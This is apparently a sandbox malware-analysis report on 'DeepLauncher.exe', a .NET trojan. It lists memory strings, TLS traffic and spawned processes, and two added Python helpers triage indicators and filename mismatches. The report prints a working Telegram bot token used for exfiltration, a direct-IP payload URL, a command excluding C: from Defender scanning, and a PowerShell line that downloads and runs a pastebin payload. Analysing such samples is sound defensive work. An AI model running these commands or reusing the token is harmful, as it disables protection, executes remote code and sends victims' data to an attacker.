Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330E8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessage(
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712
Source: powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C71A6000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/winforms
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mono/linker/issues/378
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000008.00000002.1386081536.0000024103922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://gunaframework.com/api/licensing.phpPe
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://gunaui.com/
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://gunaui.com/api/licensing.php
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://gunaui.com/pricing
Source: powershell.exe, 00000004.00000002.1519392910.0000017EBEC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1485723590.00000220C1B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1386081536.0000024103922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000008.00000002.1386081536.0000024102CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1386081536.0000024102F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/WHKzW2nr
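Most of the "String found in binary or memory" rows above are left behind by the .NET runtime, the PowerShell host (NuGet, Pester and contoso.com sample data) and the Guna UI library rather than by the sample's own logic, and the rows that do matter carry bytes from adjacent memory ("api.ipify.org0", "sendMessage(") or are cut short ("chat_id=5829712" against the chat_id=5829712415 seen on the wire). The Python below is an added example, not part of the report; it takes a subset of the rows above, copied verbatim, drops the framework hosts (that host list is this example's assumption), merges the garbage-suffixed variants, and extracts the Telegram bot id and token, the pastebin paste id, the IP-lookup services and the direct-IP payload URL. chat_id_consistent shows the cross-check a value read from a dump needs before it is published as an indicator.

```python
import re
from urllib.parse import urlsplit

# (process, string) pairs copied from the "String found in binary or memory"
# rows above. Trailing "0", "8", "(", ":" are bytes adjacent to the string in
# the dump, not part of the URL, and "chat_id=5829712" is cut short.
REPORT_STRINGS = [
    ('DeepLauncher.exe', 'http://72.5.43.195/Music.exe'),
    ('DeepLauncher.exe', 'http://72.5.43.195/Music.exe:'),
    ('DeepLauncher.exe', 'http://72.5.43.195:80/8'),
    ('DeepLauncher.exe', 'http://api.ipify.org'),
    ('DeepLauncher.exe', 'http://api.ipify.org0'),
    ('DeepLauncher.exe', 'http://api.ipify.orgnotification_sent.flag'),
    ('DeepLauncher.exe', 'http://ip-api.com/json/'),
    ('DeepLauncher.exe', 'http://ip-api.com/json/8.46.123.189'),
    ('DeepLauncher.exe', 'https://api.telegram.org/bot'),
    ('DeepLauncher.exe', 'https://api.telegram.org/bot/sendPhoto?chat_id='),
    ('DeepLauncher.exe', 'https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessage('),
    ('DeepLauncher.exe', 'https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712'),
    ('powershell.exe', 'https://pastebin.com/raw/WHKzW2nr'),
    ('powershell.exe', 'http://pastebin.com'),
    ('DeepLauncher.exe', 'https://aka.ms/binaryformatter'),
    ('DeepLauncher.exe', 'http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name'),
    ('DeepLauncher.exe', 'https://github.com/dotnet/runtime'),
    ('powershell.exe', 'https://nuget.org/nuget.exe'),
    ('powershell.exe', 'http://pesterbdd.com/images/Pester.png'),
    ('DeepLauncher.exe', 'https://gunaui.com/api/licensing.php'),
]

# Hosts that the .NET runtime, the PowerShell host and the Guna UI library leave
# in memory on their own. ASSUMPTION of this example, extend per environment.
FRAMEWORK_HOSTS = {
    'aka.ms', 'schemas.xmlsoap.org', 'schemas.datacontract.org', 'github.com',
    'nuget.org', 'www.apache.org', 'pesterbdd.com', 'contoso.com',
    'gunaui.com', 'gunaframework.com',
}
IP_LOOKUP_HOSTS = {'api.ipify.org', 'ip-api.com'}
C2_HOSTS = {'api.telegram.org', 'pastebin.com'}
TELEGRAM_RE = re.compile(r'/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)')
PASTE_RE = re.compile(r'^/raw/(?P<paste>[A-Za-z0-9]{8})$')
EXE_RE = re.compile(r'(/[^/:]+\.exe)')
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')


def canonical_host(url):
    """'api.ipify.org0' -> 'api.ipify.org': strip dump garbage after a known host."""
    host = (urlsplit(url).hostname or '').lower()
    for known in sorted(FRAMEWORK_HOSTS | IP_LOOKUP_HOSTS | C2_HOSTS, key=len, reverse=True):
        if host.startswith(known):
            return known
    return host


def classify(proc, url):
    """One record per string; fields are None where the dump cut the string."""
    host, parts = canonical_host(url), urlsplit(url)
    rec = {'process': proc, 'host': host}
    if host in FRAMEWORK_HOSTS:
        rec['category'] = 'framework-noise'
    elif host == 'api.telegram.org':
        m = TELEGRAM_RE.search(parts.path)
        chat = re.search(r'chat_id=(\d+)', parts.query)
        rec.update(category='telegram-c2',
                   bot_id=m['bot_id'] if m else None, token=m['token'] if m else None,
                   method=m['method'] if m else None, chat_id=chat[1] if chat else None)
    elif host == 'pastebin.com':
        m = PASTE_RE.match(parts.path)
        rec.update(category='pastebin-stage', paste_id=m['paste'] if m else None)
    elif host in IP_LOOKUP_HOSTS:
        rec['category'] = 'victim-ip-lookup'
    elif IPV4_RE.match(host):
        m = EXE_RE.search(parts.path)
        rec.update(category='direct-ip-download', path=m[1] if m else None)
    else:
        rec['category'] = 'unclassified'
    return rec


def summarise(rows=REPORT_STRINGS):
    """Collapse per-string hits into one record per (category, host), keeping
    the longest (least truncated) copy of each field and every API method seen."""
    merged = {}
    for proc, url in rows:
        rec = classify(proc, url)
        cur = merged.setdefault((rec['category'], rec['host']), {'processes': set()})
        cur['processes'].add(proc)
        for k, v in rec.items():
            if k in ('process', 'category', 'host') or v is None:
                continue
            if k == 'method':
                cur.setdefault('methods', set()).add(v)
            elif len(v) > len(cur.get(k, '')):
                cur[k] = v
    return merged


def actionable(merged):
    """Everything that is worth an indicator; framework noise dropped."""
    return {k: v for k, v in merged.items() if k[0] != 'framework-noise'}


def chat_id_consistent(merged, observed_chat_id):
    """A chat_id read from a dump may be a prefix only; accept it only when the
    value seen on the wire (the sendPhoto POST in the traffic rows) extends it."""
    prefix = merged.get(('telegram-c2', 'api.telegram.org'), {}).get('chat_id', '')
    return bool(prefix) and observed_chat_id.startswith(prefix)


if __name__ == '__main__':
    for key, rec in actionable(summarise()).items():
        print(key, {k: v for k, v in rec.items() if k != 'processes'}, sorted(rec['processes']))
```

The split by process is deliberate: the pastebin strings live only in powershell.exe, the Telegram and IP-lookup strings only in DeepLauncher.exe, which matches the report's picture of a PowerShell stage pulling a paste and a .NET payload talking to Telegram.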
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown | Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAB45EB7D NtWriteVirtualMemory,8_2_00007FFAAB45EB7D
Source: DeepLauncher.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2568455253.00000233C6962000.00000020.00000001.00040000.00000003.sdmp | Binary or memory string: OriginalFilenameDeepLauncher.dll: vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.TraceSource.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.TraceSource.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000000.1305223115.00007FF6E6CC8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemscordaccore.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000000.1305223115.00007FF6E6CC8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDeepLauncher.dll: vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exeBinary or memory string: OriginalFilenamemscordaccore.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exeBinary or memory string: OriginalFilenameDeepLauncher.dll: vs DeepLauncher.exe
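The rows above compare the OriginalFilename field of each version resource found in the sample's address space with the name on disk. Almost all of them name .NET runtime assemblies (System.*, mscordaccore.dll), which is exactly what a self-contained or single-file .NET build carries inside its own bundle (the hostfxr and "application bundle" strings further down point the same way), and DeepLauncher.dll vs DeepLauncher.exe is the normal apphost pairing. The helper below is an added example, not part of the Joe Sandbox report: it parses such rows and keeps only the pairs that would indicate a real masquerade. The runtime-prefix list, the category names and the svchost.exe control row are assumptions made for the illustration.

```python
"""Triage 'OriginalFilename ... vs <sample>' rows from a sandbox report.

Added example, not part of the Joe Sandbox report. The runtime-prefix list
and the category names are assumptions made for this illustration.
"""
import re
from pathlib import PureWindowsPath

# Names that a self-contained / single-file .NET build carries inside its own
# bundle, so seeing their version resources in the sample's memory is expected.
DOTNET_RUNTIME_PREFIXES = ("system.", "microsoft.", "mscorlib", "netstandard",
                           "mscordaccore", "mscordbi", "coreclr", "clrjit",
                           "hostfxr", "hostpolicy")

# Matches the value pair in a report row. The optional '@' or ':' after the name is
# the byte that followed the string in the version resource, not part of the filename.
_ROW_RE = re.compile(r"OriginalFilename(?P<orig>\S+?)[@:]?\s+vs\s+(?P<disk>\S+)")


def parse_row(row: str):
    """Return (original_filename, on_disk_name) from a report row, or None."""
    m = _ROW_RE.search(row)
    return (m.group("orig"), m.group("disk")) if m else None


def classify(original: str, on_disk: str) -> str:
    """Explain a mismatch instead of just flagging it."""
    o, d = PureWindowsPath(original), PureWindowsPath(on_disk)
    if o.stem.lower() == d.stem.lower():
        if o.suffix.lower() == ".dll" and d.suffix.lower() == ".exe":
            return "dotnet-apphost"   # <app>.exe is the native host that loads <app>.dll
        return "match"
    if o.name.lower().startswith(DOTNET_RUNTIME_PREFIXES):
        return "bundled-runtime"      # framework assembly shipped inside the sample
    return "mismatch"                 # genuine masquerade candidate: inspect this one


def summarize(rows):
    """Count categories and collect the pairs that still deserve a look."""
    counts = {"match": 0, "dotnet-apphost": 0, "bundled-runtime": 0, "mismatch": 0}
    suspicious = []
    for row in rows:
        pair = parse_row(row)
        if pair is None:
            continue
        cat = classify(*pair)
        counts[cat] += 1
        if cat == "mismatch":
            suspicious.append(pair)
    return counts, suspicious


# Constructed rows: the first three copy values from the report, the last is an
# invented control case showing what a genuine masquerade would look like.
SAMPLE_ROWS = [
    "Source: DeepLauncher.exe | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs DeepLauncher.exe",
    "Source: DeepLauncher.exe | Binary or memory string: OriginalFilenamemscordaccore.dll@ vs DeepLauncher.exe",
    "Source: DeepLauncher.exe | Binary or memory string: OriginalFilenameDeepLauncher.dll: vs DeepLauncher.exe",
    "Source: DeepLauncher.exe | Binary or memory string: OriginalFilenamesvchost.exe@ vs DeepLauncher.exe",
]

if __name__ == "__main__":
    counts, suspicious = summarize(SAMPLE_ROWS)
    print(counts)
    print("inspect:", suspicious)
```

Because the regex searches inside the row, it does not care whether the source column is separated from the finding or fused with it, so the raw report text can be fed in unchanged. Treat the prefix list as a starting point: a sample can of course name its own module after a framework assembly, so "bundled-runtime" only says the name is consistent with a .NET bundle, not that the module is genuine.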
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@17/23@5/5
Source: C:\Users\user\Desktop\DeepLauncher.exe | File created: C:\Users\user\AppData\Roaming\notification_sent.flag
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Users\user\Desktop\DeepLauncher.exe | File created: C:\Users\user\AppData\Local\Temp\djqvlzhk.zaz
Source: C:\Users\user\Desktop\DeepLauncher.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DeepLauncher.exe | Virustotal: Detection: 15%
Source: DeepLauncher.exe | ReversingLabs: Detection: 24%
Source: DeepLauncher.exe | String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: DeepLauncher.exe | String found in binary or memory: Morph - Structs/AddrExp
Source: DeepLauncher.exe | String found in binary or memory: @0x%x with loopPre-importprejittail.call and not BBINSTRExpand patchpointsPost-importImportationIndirect call transformProfile incorporationMorph - InitProfile instrumentation prepProfile instrumentationAllocate ObjectsRemove empty tryMorph - InliningMorph - Add internal blocksClone finallyUpdate finally target flagsRemove empty finallyMerge callfinally chainsEarly livenessPhysical promotionUpdate flow graph early passMorph - Structs/AddrExpMorph - ByRefsMorph - Promote StructsForward SubstitutionIdentify candidates for implicit byref copy omissionGS CookieCompute edge weights (1, false)Morph - GlobalMorph - FinishMerge throw blocksInvert loopsCreate EH funcletsTail mergeOptimize layoutCompute blocks reachabilityPost-morph tail mergeOptimize control flowFind loopsClone loopsSet block weightsRedundant zero InitsMorph array opsHoist loop codeUnroll loopsClear loop infoFind oper orderSet block orderMark local varsOptimize boolsSSA: Doms1SSA: livenessBuild SSA representationSSA: topological sortSSA: renameEarly Value PropagationSSA: DFSSA: insert phisOptimize Valnum CSEsVN based copy propDo value numberingOptimize index checksAssertion propIf conversionVN based intrinsic expansionRedundant branch optsCompute edge weights (2, false)Stress gtSplitTreeVN-based dead store removalUpdate flow graph opt passExpand TLS accessInsert GC PollsExpand runtime lookupsExpand static initDo 'simple' loweringLocal var livenessDetermine first cold blockRationalize IRGlobal local var livenessLowering decompositionLocal var liveness initPer block local var livenessLinear scan register allocLSRA build intervalsLowering nodeinfoCalculate stack level slotsPlace 'align' instructionsGenerate codeLSRA allocateLSRA resolvePost-EmitEmit codeEmit GC+EH tablesProcessor does not have a high-frequency timer.
Source: DeepLauncher.exe | String found in binary or memory: GC initialization failed with error 0x%08XVirtualAlloc2kernelbase.dllMapViewOfFile3bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy--depsfilePath containing probing policy and assemblies to probe for.<path>--additionalprobingpath--fx-versionPath to <application>.runtimeconfig.json file.--runtimeconfigPath to <application>.deps.json file.<value>--roll-forwardVersion of the installed Shared Framework to use to run the application.<version>--roll-forward-on-no-candidate-fxPath to additional deps.json file.--additional-depsRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)Parsed known arg %s = %ssdk<obsolete><n>Application '%s' is not a managed executable.Using the provided arguments to determine the application to execute. %s %-*s %sFailed to parse supported options or their values:--- Executing in split/FX mode...The application to execute does not exist: '%s'dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'Application '%s' does not exist.staticexec--- Executing in muxer mode...--- Executing in a native executable mode...
Source: DeepLauncher.exe | String found in binary or memory: %s --list-runtimes Display the installed runtimeshost-options: The path to an application .dll file to execute.path-to-application: --info Display .NET information. -h|--help Displays this help.Common Options: --list-sdks Display the installed SDKsinvalid hash bucket countunordered_map/set too longinvalid string positionvector too longInvalid startup info: host_path, dotnet_root, and app_path should not be null.A fatal error occurred while processing application bundlehostfxr_main_bundle_startupinfo--- Invoked %s [version: %s]hostfxr_main_startupinfoget-native-search-directories--list-runtimes--list-sdksUsing dotnet root path [%s]/?-?--help-hdotnet.dll The command could not be loaded, possibly because:
Source: DeepLauncher.exe | String found in binary or memory: %s --list-runtimes Display the installed runtimeshost-options: The path to an application .dll file to execute.path-to-application: --info Display .NET information. -h|--help Displays this help.Common Options: --list-sdks Display the installed SDKsinvalid hash bucket countunordered_map/set too longinvalid string positionvector too longInvalid startup info: host_path, dotnet_root, and app_path should not be null.A fatal error occurred while processing application bundlehostfxr_main_bundle_startupinfo--- Invoked %s [version: %s]hostfxr_main_startupinfoget-native-search-directories--list-runtimes--list-sdksUsing dotnet root path [%s]/?-?--help-hdotnet.dll The command could not be loaded, possibly because:
Source: DeepLauncher.exe | String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: unknown | Process created: C:\Users\user\Desktop\DeepLauncher.exe "C:\Users\user\Desktop\DeepLauncher.exe"
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
